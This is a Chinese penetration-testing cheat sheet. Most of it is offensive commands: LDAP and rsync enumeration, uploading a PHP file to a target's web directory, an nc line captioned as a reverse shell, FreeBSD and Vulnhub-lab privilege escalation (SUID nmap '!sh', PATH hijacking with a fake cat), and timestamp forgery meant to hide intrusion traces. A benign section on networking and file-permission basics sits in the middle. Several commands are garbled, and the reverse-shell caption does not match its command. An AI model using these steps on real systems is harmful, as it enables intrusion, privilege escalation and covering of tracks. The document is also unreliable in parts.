Linux下自带渗透方面的命令
一.ldap渗透技巧
(LDAP是轻量目录访问协议,它是基于X.500标准的,但是简单多了并且可以根据需要定制。与X.500不同,LDAP支持TCP/IP,这对访问Internet是必须的。)
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式
2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置
3.查找管理员信息
匿名方式
ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b“cn=administrator,cn=People,dc=unix-center,dc=net”-h 192.168.2.2
有密码形式
ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b“cn=administrator,cn=People,dc=unix-center,dc=net”-h 192.168.2.2
4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口
5.返回所有的属性
ldapsearch-h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s sub “objectclass=*”
6.查看基类
ldapsearch -h192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s base “objectclass=*” | more
7.查找
ldapsearch -h 192.168.7.33 -b “” -s base “objectclass=*”
二.NFS渗透技巧
列举IP
showmount-e ip
三.rsync渗透技巧
1.查看rsync服务器上的列表
rsync 210.51.X.X::
2.看相应的下级目录(注意一定要在目录后面添加上/)
rsync210.51.X.X::htdocs_app/
3.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
4.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt
四.squid渗透技巧
nc-vv 91ri.org 80
(squid为代理服务器,命令意思是建立反弹shell)
五.freebsd本地提权
[argp@julius~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@julius ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@julius ~]$ gcc -Wallnfs_mount_ex.c -o nfs_mount_ex
* [argp@julius ~]$ ./nfs_mount_ex
六.cvs渗透技巧
CVSROOT/passwdUNIX SHA1的密码文件
CVSROOT/readers
CVSROOT/writers
CVS/Root
CVS/Entries 更新的文件和目录内容
CVS/Repository
七.修改上传文件时间戳(掩盖入侵痕迹)
touch-r 老文件时间戳 新文件时间戳
Linux网卡配置和网络诊断命令
1、ifconfig:这个命令可以查看当前主机的ip地址和网卡信息
(ifconfig eth0:查看制定网卡信息
附加网卡的启用ifupeth0与停用stop eth0命令)
2、ping:ping命令可以用来测试网络的连通性,使用非常广泛,不论是一般用户还是黑客都喜欢钟爱这个命令
3、netstat:netstat (网络统计)命令显示连接信息,路由表信息等,通常配合使用参数
(netstat -?:查看参数的功能 netstat -r:查看路由信息)
4、traceroute:traceroute是路由跟踪命令,可以查看到你从源到目的的所经过的路由
(例如:traceroute www.baidu.com以跟踪访问百度)
5、dig与nslookup:dig查询DNS相关信息记录,CNAME,MX记录等等。这个命令主要用于解决相关DNS查询;nslookup也具备查询DNS的功能,还可以显示一个ip地址的记录!
(例如:dig www.baidu.com查询百度的DNS nslookupwww.baidu.com)
6、host和hostname:host命令可以用来查找到IP的名称或IP的名字在IPv4和IPv6 DNS记录,hostname命令查看主机名,或者你可以到/etc/sysconfig/network中修改主机名
7、route:可以用来查看路由表,也可以用来增加和删除路由条目
8、arp:ARP为地址解析协议,可以看到默认的表使用
9、ethtool:ethtool查看到网络模式和网络速度等信息。有关配置可以到/etc/sysconfig/network-scripts/ifcfg-eth0下进行修改
10、GUI管理命令system-config-network,图形化的管理界面调用命令
Linux中的特殊权限s、t、i、a
文件权限除了r、w、x外还有s、t、i、a权限:
s:文件属主和组设置SUID和GUID,文件在被设置了s权限后将以root身份执行。在设置s权限时文件属主、属组必须先设置相应的x权限,否则s权限并不能正真生效(chmod命令不进行必要的完整性检查,即使不设置x权限就设置s权限,chmod也不会报错,当我们ls -l时看到rwS,大写S说明s权限未生效)Linux修改密码的passwd便是个设置了SUID的程序,普通用户无读写/etc/shadow文件的权限却可以修改自己的密码
t:设置粘着位,一个文件可读写的用户并一定想让他有删除此文件的权限,如果文件设置了t权限则只有属主和root有删除文件的权限。通过chmod +t filename 来设置t权限。
i:不可修改权限(例:chattr u+i filename 则filename文件就不可修改,无论任何人,如果需要修改需要先删除i权限,用chattr -i filename就可以了。查看文件是否设置了i权限用lsattr filename。)
a:只追加权限,对于日志系统很好用,这个权限让目标文件只能追加,不能删除,而且不能通过编辑器追加。可以使用chattr +a设置追加权限。
Linux提权(Vulnhub下载)
实验1:利用Linux内核漏洞提权(VulnOSversion 2)
1、首先移动到/tmp目录,然后新建一个文件,粘贴exploit代码进去
2、保存退出后,编译代码:gcc exploit.c -o exploit
3、现在执行,如果提示没有权限,还需:chomd 777 ./exploit
4、当已经获取到了root权限,接下来获取交互式的shell:
python -c‘import pty; pty.spawn(“/bin/bash”)’
注意:内核exploit提权有风险,有可能会崩溃系统。
实验2:利用低权限用户目录下可被Root权限用户调用的脚本提权(Mr.Robot)
Mr.Robot是一个boot到root的挑战虚拟机
1、切换到tmp目录下
2、寻找系统里可以用的SUID文件来提权:
find /-perm -u=s -type f 2>/dev/null
3、通过截图,我们发现nmap居然有SUID标志位,来看看nmap版本:
/usr/local/bin/nmap--version
发现nmap版本为3.48/3.81
nmap支持“interactive”选项,用户能够通过该选项执行shell命令,通常,安全人员会使用该命令来避免他们使用nmap命令被记录在history文件中:/usr/local/bin/nmap --interactive
4、因为nmap有SUID位,所以通过“!sh”我们会获取到一个root权限的shell:
!sh
实验3:利用环境变量劫持高权限程序提权(PwnLad)
PwnLad中一个攻击者有几个账号,但是都不是root权限。
当前登录的是”Kane”账号,当前没有有效的内核exploit,也没有其他可以利用的suid文件
1、Kane的home目录下只有一个“msgmike.”文件
2、使用file命令查看下这个文件:file msgmike
3、从截图可以看到,这是一个ELF 32位LSB执行文件,但是当我们执行文件的时候,报错了
4、通过报错信息我们可以看到msgmike调用cat命令读取/home/mike/msg.txt文件。针对这种情况,我们可以通过设置bash的$path环境变量来利用,通常的$PATH包含,然而当我们调用cat命令的时候,cat会从以上目录来寻找,如果我们添加.到$PATH环境变量,则会先从当前目录来寻找cat指令
exportPATH=”.”
5、新建cat,添加执行权限:
touch cat
echo“/bin/sh” > cat
6、这样当我们再次运行./msgmike命令的时候,就会触发当前目录下的cat(/bin/sh),从而提权